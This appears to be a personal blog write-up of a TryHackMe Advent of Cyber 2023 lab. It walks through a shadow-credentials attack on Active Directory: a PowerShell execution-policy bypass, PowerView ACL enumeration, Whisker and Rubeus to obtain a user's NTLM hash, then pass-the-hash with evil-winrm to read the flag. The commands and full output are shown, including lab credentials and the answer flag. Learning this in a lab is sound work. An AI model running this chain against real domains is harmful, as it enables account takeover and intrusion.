Home Jingle Bells, Shadow Spells
Post
Cancel

Jingle Bells, Shadow Spells

Posted Dec 15, 2023
By KS
3 min read

Challenge Information

  • Advent of Cyber Day 11
  • THM link here

Explanation

Today’s topic is about active directory which is something that I’m weak at. Before starting the challenge, We will need to run to following to bypass the default policy for arbitrary PowerShell script execution.

1
2

powershell -ep bypass
. .\PowerView.ps1

Question 1: What is the hash of the vulnerable user?

To get this answer, we still need to identify the user. Since the given machine is logged in as hr lets try to have a look at current user privileges.

1

PS C:\Users\hr\Desktop> Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "hr"}                                                                                                                                                                                                                                                                                                ObjectDN                : CN=vansprinkles,CN=Users,DC=AOC,DC=local                                                                    AceQualifier            : AccessAllowed                                                                                               ActiveDirectoryRights   : ListChildren, ReadProperty, GenericWrite                                                                    ObjectAceType           : None                                                                                                        AceFlags                : None                                                                                                        AceType                 : AccessAllowed                                                                                               InheritanceFlags        : None                                                                                                        SecurityIdentifier      : S-1-5-21-1966530601-3185510712-10604624-1115                                                                IdentityReferenceName   : hr                                                                                                          IdentityReferenceDomain : AOC.local                                                                                                   IdentityReferenceDN     : CN=hr,CN=Users,DC=AOC,DC=local                                                                              IdentityReferenceClass  : user

Based on the result, We have a CN named vansprinkles. Lets try to get the hash of this CN.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

.\Whisker.exe add /target:vansprinkles
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] No pass was provided. The certificate will be stored with the password 8b4QLOrmXjhxpQGR
[*] Searching for the target account
[*] Target user found: CN=vansprinkles,CN=Users,DC=AOC,DC=local
[*] Generating certificate
[*] Certificate generaged
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 3e4e2d81-7f09-4b5b-b7d3-56ff87c2334f
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:vansprinkles /certificate:MIIJwAIBAzCCCXwGCSqGSIb3DQEHAaCCCW0EgglpMIIJZTCCBhYGCSqGSIb3DQEHAaCCBgcEggYDMIIF/zCCBfsGCyqGSIb3DQEMCgECoIIE/jCCBPowHAYKKoZIhvcNAQwBAzAOBAjtp89TxLODwAICB9AEggTYHCB/bOx2DHeM+vcpzLRCrhriX2p1BEh/CzyicPOsDdXl5dQr8+EfLMF9ffiyxG2Ad9tLJjr4Z2YBdgvw7yp/6QyL7rgcCYlxJxlSEqt0E4psE/vneeh6aChttji4R0IaUWLFZK7dcOXvsvBa7584RXeg8urecH7P1PSs1+Q7mWUXFG4CaRDHAtSQP55lM19i3zF62x7dtPWXI2MX1bvPxtV4dmqqlCIJAmvCN8b1TPHfWcVJ6F0ZXiYyeuoraq4cRJaeMtpw1CKGueVE5EhUaIOlgP8fiBSub6rs2mPFdZr5+CnTY1SlUknDAQ+RGjI7B7Fl4uOA8N2wAcYtROmpGFxogN7SWohjefF4cikWF1/08D2KerQ78rZAtxzgir4aKU2gYN8VqEz5ev7oUP5XsXv+HonICBDPScltZX3VBwCKev4FE04ddShooy9EtbyynUErrONWyVUosBt0EoYk2d68wy5i9WRfr09EWKU3aYMblrVCwcYFM9IFJLOHnIK3QUBTCvCJ1Rdi5MBE0Yu0CagdKvt8k5dJSIJXlG/FqOp7GAJorahnPACajriM2Y+HLIbGRK1vuZsdzMl1bc2LwMxoS9UGTC8nRd9/07mHhqRmxEf49dlRZIdsQAE7pk/d7czqJK56iAC4brdMSj68yJDV5629KaNxqpZDncYJHTGpSbp9AQn1L5kPXS6x91WFwEtjoGNNZoPWy2mf0AlevsaFqDWJw1GRxiNntbnjJVWAzPXGIQrsiy7UEGNndmqeYGIXfgrfiBycccktIowkTgwoTW5UnNQxT8wOc/4ys5LXQyvDyDpheNhDOkHYartJcCb1r0YImcfYQLlTV/mP/SUIjbkmnrIG9vX3on9YbAqD+/E98pWCKraTRR5GoKOqGiwwSWv5Oh6a3HwYjGMvMYFFspOB17eVzIWUNQH6+iFRhfTFxfqa0vF60LUyn5cpe11gePTMblMrHJXKusilmrIMPA+Z0+3it9CcL94p6+ih0QObp00s7JSWlAtPWuCklPEQKOSTcWCaEkVq1I3FRyhnbCtbYtqJWyJTNaRxrOrPSOQMZ/M9TOuovzVXoqBMR0wRNoprZaSItl4li9Dkb2FkkLVqozZJaogCOyuB8YiuCAqcHHBi4MeDGh03qCYVc18uclB/eaCFUD/rxOw858q/NSFBLo8oOvJRO7acjGumCfY0cZ1ESsg2gCs9hNtwodLxqdarSonQEOzHcDFrbgERMgfoTH1MmaecN6jMwpymtFjDzfMuP0joJBz4DkguYwTPZTeGMZa/O8evnZPtv3sszhDMLhHQOuoetDqr/mVo3pNt4BQx5Ogs21X+Ns3NWqIPHo82pDqfcypa63YnqDhpLjVM1s9C1vOlAczWUmrP0Ir9oBtPkboUYqOR+U1PKypSKwhXaJFq7ZkknTbIf0l3OqYMO5VC34plvyw2+HvFCPkoe4hg5jD2GIzAN7b/Q/31WE49ZbATR9sjgLXFHyCwXadSLLvy80+Ohove8k9+T4U0nlQagX4x9nXypkYbhGNtnPyGpsg4un/4+Z1X/LNL3jztGqFvFxHarlYOG38ACPqa1vq6QnaSENFr6STQKA6GoPvrHEx5EKC6fedtuWjwwLAFOoYQkV8E6qbDRe5VpTAQQcwXhzGB6TATBgkqhkiG9w0BCRUxBgQEAQAAADBXBgkqhkiG9w0BCRQxSh5IAGMAYgA5AGQAMABiADMAZQAtADYAMgAzAGEALQA0ADUAMgBiAC0AOQBjAGQANQAtADkAMgA0AGYAMQBkADkAMgAyADAAYQBiMHkGCSsGAQQBgjcRATFsHmoATQBpAGMAcgBvAHMAbwBmAHQAIABFAG4AaABhAG4AYwBlAGQAIABSAFMAQQAgAGEAbgBkACAAQQBFAFMAIABDAHIAeQBwAHQAbwBnAHIAYQBwAGgAaQBjACAAUAByAG8AdgBpAGQAZQByMIIDRwYJKoZIhvcNAQcGoIIDODCCAzQCAQAwggMtBgkqhkiG9w0BBwEwHAYKKoZIhvcNAQwBAzAOBAgVQEV5meetuAICB9CAggMAseOQYwFGCHJuAKxl5QXPgjdXLD72ghzq3IqTg550pYhd0xrnpFtaFs6hodf/HBH6qzKrMpGaprYOuyg2CFN2F9z6ltOXSKoAvJa8waKMucB9VHOCrYH9qFTlHFN4mSLTOzxicQKolheVv375v78vYyzmnZHhY9d8KBD7zBWmMmLTvDj7m4CiZT72dTG0siACAlRinDo/8+T0M24gTWOyc2LIbsyUFlCdhKrtcIMOoyUbcDTqpOGtXY3aGa3ImrkFBiKHpA0d0hj9ny6miTEdN/9vS8jLbYnxQ0IVtk9IkeZZbCXARxb17+SgyAYL02nOxsB/jFNwsFX0IfmpYz2VDHFHlwAiHgOl3e0VBvS2ODHEZCYNynlkUYPxjSb+3j5voq265R9JUmOHouUJWt6IB0F6oWtQjNGRPAVVKteP2CuLJrSrSntm4KKFsRR5h/iHYX5DGCCqww5buicm5zcE/m+9nJQ+SshdHpX09DrE0ghgJRht2oUvIil7ymCMY+j373SvKc1vuTlBPq+ZqP/jqBXz2CijR4nVchC0DJ0frVwQlAuAZ757vt5RL5jzJz6kKPQzNJeaMBi8sG/e//oFRU5bPh/wupHle8szqM8czdWbIGaNIvuigVvSuq+9/g2+4fwJiCzOyqDyKvGAuD8I6KJisvMVWEKHe/G3BleF/eId4IahjU98LHlFMs5cXFlU73YpDGDXvKx5lqIN3iu02dSevq6d9Xwinz3mEqjN3YzsSv2hG8IZU40f7JQoIgMQtDgIuH9HlSk55dv/WUuvO1K/Xx+I9XbpDcEV6I7HBcpP+iuA1BHx9eqQHyAblgNprjdtf8pbJkdZ9gYRNuVPt/2Kb8acssnU0S69Pwnvs0MyEuCf6kjSU1lsSnQaXK6O91UxGT3/jEDnxiedA3fdsU7WNjOIxr/Cai+BKM4dQhil/qwXACGZnkEVWo4B9QBJRc7eBqbftsaTO+SrTkaDu23B9FZbdtQUNlNpCknS1W8Oftg40C4ZmHvdiQ7yavKxMDswHzAHBgUrDgMCGgQUcY5Jx+ICRInKpHo+1NnNopViN/wEFNsPBE11L9KJUIdMno4O0dKzEozKAgIH0A== /password:"8b4QLOrmXjhxpQGR" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

Once Whisker is completed, it will auto generate a rubeus command for us to execute and get the hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

PS C:\Users\hr\Desktop> .\Rubeus.exe asktgt /user:vansprinkles /certificate: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 /password:"erTNWCA7JUTKtiQw" /domain:AOC.local /dc:southpole.AOC.local /getcredentials /show

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=vansprinkles
[*] Building AS-REQ (w/ PKINIT preauth) for: 'AOC.local\vansprinkles'
[*] Using domain controller: fe80::19ee:5fd4:8fd1:e800%5:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      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
      T0MubG9jYWw=

  ServiceName              :  krbtgt/AOC.local
  ServiceRealm             :  AOC.LOCAL
  UserName                 :  vansprinkles
  UserRealm                :  AOC.LOCAL
  StartTime                :  12/15/2023 2:08:52 AM
  EndTime                  :  12/15/2023 12:08:52 PM
  RenewTill                :  12/22/2023 2:08:52 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  8/i1Yh/nLukdlGS9+kfwSg==
  ASREP (key)              :  D8DB8A1251C5AFA5E840806C7FE455D5

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 03E805D8A8C5AA435FB48832DAD620E3

The answer is the NTLM hash.

Question 2: What is the content of flag.txt on the Administrator Desktop?

Now that we have the hash, we can just login with it using evil-winrm in our attacker machine.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

evil-winrm -i 10.10.214.237 -u vansprinkles -H 03E805D8A8C5AA435FB48832DAD620E3 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                                                                                                 
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                                                                                                   
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\vansprinkles\Documents> cd ..\..
*Evil-WinRM* PS C:\Users> cd Administrator
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/22/2023  10:56 AM                chatlog_files
-a----       11/22/2023  10:29 AM          11620 chatlog.html
-a----       10/16/2023   7:33 AM             17 flag.txt


ca*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat flag.txt
THM{XMAS_IS_SAFE}

Things I learned from the challenge

  • AD
  • Pass the hash
THM
AoC-2023 Active-Directory
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

Inject the Halls with EXEC Queries

Sleighing Threats, One Layer at a Time